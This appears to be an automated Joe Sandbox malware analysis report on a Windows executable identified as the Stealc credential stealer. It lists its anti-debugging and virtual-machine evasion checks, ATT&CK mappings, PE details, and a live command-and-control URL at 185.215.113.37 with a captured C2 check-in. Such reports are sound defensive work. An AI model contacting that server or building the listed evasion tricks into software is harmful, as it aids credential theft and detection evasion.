                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E54910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E4E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E54570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E4ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E53EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F68A FindFirstFileA,0_2_00E4F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41160 GetSystemInfo,ExitProcess,0_2_00E41160
                Source: file.exe, file.exe, 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2208867559.0000000001D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                Source: file.exe, 00000000.00000002.2208867559.0000000001CE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2208867559.0000000001D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13391
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13405
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13394
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13413
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13445
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 rdtsc 0_2_01248B89
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E445C0 VirtualProtect ?,00000004,00000100,000000000_2_00E445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59750 mov eax, dword ptr fs:[00000030h]0_2_00E59750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00E578E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E59600
                Source: file.exe, file.exe, 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E57B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E57980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00E57980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E57850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E57850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E57A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E57A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory651
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                fp2e7a.wpc.phicdn.net
                		192.229.221.95
                		truefalse
                  		unknown
                  windowsupdatebg.s.llnwi.net
                  		87.248.204.0
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/true
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phptrue
                    • URL Reputation: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/e2b1563c6670f193.phpKfile.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/Ufile.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37file.exe, 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpofile.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpUfile.exe, 00000000.00000002.2208867559.0000000001CE2000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/wsfile.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.phpzfile.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.37
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1529339
                                Start date and time:2024-10-08 21:41:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 16s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 20
                                • Number of non-executed functions: 89
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded IPs from analysis (whitelisted): 20.190.159.23, 20.190.159.75, 40.126.31.67, 20.190.159.0, 20.190.159.64, 40.126.31.73, 20.190.159.68, 40.126.31.71
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                fp2e7a.wpc.phicdn.netSecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                • 192.229.221.95
                                https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==Get hashmaliciousHTMLPhisherBrowse
                                • 192.229.221.95
                                https://dc.dolshgdh.site/?Ufrj=g5Get hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                https://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4Get hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                15PylGQjzK.exeGet hashmaliciousLummaC, VidarBrowse
                                • 192.229.221.95
                                https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                https://dvj-305jg-9h.car-financeclaim.co.uk/4-604-9vh-9h35g-h3.html#info@tintolaw.co.zaGet hashmaliciousHTMLPhisherBrowse
                                • 192.229.221.95
                                http://lifecodigestion.comGet hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                • 192.229.221.95
                                https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                windowsupdatebg.s.llnwi.nethttps://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                • 41.63.96.0
                                Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                • 87.248.205.0
                                http://pay.christinagstewart.com/Get hashmaliciousUnknownBrowse
                                • 87.248.205.0
                                http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/Get hashmaliciousUnknownBrowse
                                • 87.248.204.0
                                Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                • 178.79.208.1
                                https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==Get hashmaliciousUnknownBrowse
                                • 87.248.204.0
                                https://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                • 87.248.205.0
                                8ID0109FLT24PO92CD-R.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 87.248.205.0
                                https://fenster-mark-gmbhsharefile.btn-ebikes.com/Get hashmaliciousUnknownBrowse
                                • 87.248.205.0
                                http://46.27.141.62Get hashmaliciousUnknownBrowse
                                • 87.248.205.0

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.949006571183067
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'853'440 bytes
                                MD5:02978bae9becb20a4ba6f439f8eb552f
                                SHA1:728da10f79bc011ea19ca78aa8aae0b9946f9f4b
                                SHA256:669036c06a6fd0494eb7db1eac48d0a477a47d7fff54dcc29fdbf7876ef39900
                                SHA512:5f507e3e5c0741199acf4fb28626e643ba671ff7b36093ede4eada9869c53c1f8d80682d06e8a34fe8550b9ddc657111f73ffad1b5f0cf3ef00bc83a6c91c6f7
                                SSDEEP:49152:m4wsF5Eod/ll4PfCcvJevtnOLfjfbBCSsU:9wsF5Eox0Ol0/BCSl
                                TLSH:578533245F32F01EC0A82BB5C61B927339757FA478B44EBA198E07457ADCC1C58DFA68
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xaa4000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F39A53AA93Ah

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x25b0000x22800a06c30b68028b5920eca54c7d2fe980cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x25e0000x2a60000x200f60c423fb70ed43a20ea348cb4a35d51unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                gklmxpts0x5040000x19f0000x19e60028dc9add79b3b4ddb9df28abc7797287False0.9951693297511313data7.955274531054208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                csoyoskk0x6a30000x10000x400d3f7d98a4051476a2fb8da90897f30b5False0.8076171875data6.217901750673708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x6a40000x30000x22009db8f1ecdb6b177dbca642407afeeab1False0.06502757352941177DOS executable (COM)0.6394435046751349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-08T21:42:18.802712+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549727185.215.113.3780TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 8, 2024 21:42:17.547411919 CEST4972780192.168.2.5185.215.113.37
                                Oct 8, 2024 21:42:17.553010941 CEST8049727185.215.113.37192.168.2.5
                                Oct 8, 2024 21:42:17.553353071 CEST4972780192.168.2.5185.215.113.37
                                Oct 8, 2024 21:42:17.553353071 CEST4972780192.168.2.5185.215.113.37
                                Oct 8, 2024 21:42:17.558753967 CEST8049727185.215.113.37192.168.2.5
                                Oct 8, 2024 21:42:18.558069944 CEST8049727185.215.113.37192.168.2.5
                                Oct 8, 2024 21:42:18.558212996 CEST4972780192.168.2.5185.215.113.37
                                Oct 8, 2024 21:42:18.563785076 CEST4972780192.168.2.5185.215.113.37
                                Oct 8, 2024 21:42:18.569120884 CEST8049727185.215.113.37192.168.2.5
                                Oct 8, 2024 21:42:18.802558899 CEST8049727185.215.113.37192.168.2.5
                                Oct 8, 2024 21:42:18.802711964 CEST4972780192.168.2.5185.215.113.37
                                Oct 8, 2024 21:42:21.161889076 CEST4972780192.168.2.5185.215.113.37

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
